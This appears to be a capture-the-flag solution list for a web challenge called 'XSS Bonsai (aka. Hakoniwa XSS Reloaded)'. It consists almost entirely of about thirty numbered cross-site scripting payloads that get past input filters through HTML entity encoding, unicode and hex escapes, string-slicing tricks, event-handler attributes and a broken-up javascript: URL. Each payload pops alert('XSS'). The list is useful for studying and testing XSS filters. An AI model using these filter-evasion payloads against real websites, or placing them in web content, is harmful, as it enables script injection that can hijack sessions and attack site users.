XSS Bonsai (aka. Hakoniwa XSS Reloaded) [Web500]

1. ";parent['aaaalert'.substring(-(~[]+~[]+~[]))]('aaaXSS'.substring(-(~[]+~[]+~[])))//
2.  
3. \";frames['zzzalert'.slice(-(~[]+~[]+~[]))]('zzzXSS'.slice(-(~[]+~[]+~[])))//
4.  
5. '&#000045alert(&#000039XSS')-'
6.  
7. ")};\u0066rames["xxxalert".\u0073lice(-(~[]+~[]+~[]))]("xxxXSS".\u0073lice(-(~[]+~[]+~[])))//
8.  
9. \x3Cimg\x09src=/\x09onerror\x3dalert(\x27XSS')//
10.  
11. \u003Cimg\u0009src\u003d/\u0009onerror\u003dalert\u0028\u0027XSS'\u0029//
12.  
13. <strike/onmouseover=&#x00005Cu0061lert('&#x00005Cu0058SS')>///
14.  
15. <h1/onmousedown=&#x0005Cu0061lert('&#x0005Cu0058SS')>///
16.  
17. <h2/onmouseup=&#x005Cu0061lert('&#x005Cu0058SS')>///
18.  
19. <h3/onmousemove=&#x05Cu0061lert('&#x05Cu0058SS')>///
20.  
21. <h4/onmouseenter=&#x5Cu0061lert('&#x5Cu0058SS')>///
22.  
23. <h5/onmouseleave=&#000092u0061lert('&#000092u0058SS')>///
24.  
25. <h6/onmouseout=&#00092u0061lert('&#00092u0058SS')>///
26.  
27. <abbr/oncontextmenu=&#0092u0061lert('&#0092u0058SS')>///
28.  
29. <acronym/ondblclick=&#092u0061lert('&#092u0058SS')>///
30.  
31. <address/onclick=&#92u0061lert('&#92u0058SS')>///
32.  
33. <isindex/onfocusin=&#x00061lert('&#x00058SS')>
34.  
35. <textarea/onfocus=&#x0061lert('&#x0058SS')>
36.  
37. <marquee/onscroll=&#x061lert('&#x058SS')>///
38.  
39. <select/onkeypress=&#x61lert('&#x58SS')>
40.  
41. <strong/contenteditable/oncopy=&#000097lert('&#000088SS')>///
42.  
43. <img/src='/'onerror=&#00097lert('&#00088SS')>
44.  
45. <button/onkeydown=&#0097lert('&#0088SS')>///
46.  
47. <input/onpaste=&#097lert('&#088SS')>
48.  
49. <span/tabindex='999'/onblur=[]&#00045alert(&#00039XSS')>///
50.  
51. <bgsound/onpropertychange=[]&#0045alert(&#0039XSS')>
52.  
53. <div/style=style:expression([]&#045alert(&#039XSS'))>
54.  
55. <script>\u0070arent['nnnalert'.\u0073ubstring(-(~[]+~[]+~[]))]('mmmXSS'.\u0073ubstring(-(~[]+~[]+~[])))//</script>
56.  
57. <a/href="javas cript:alert('XSS')">///
58.  
59. /mk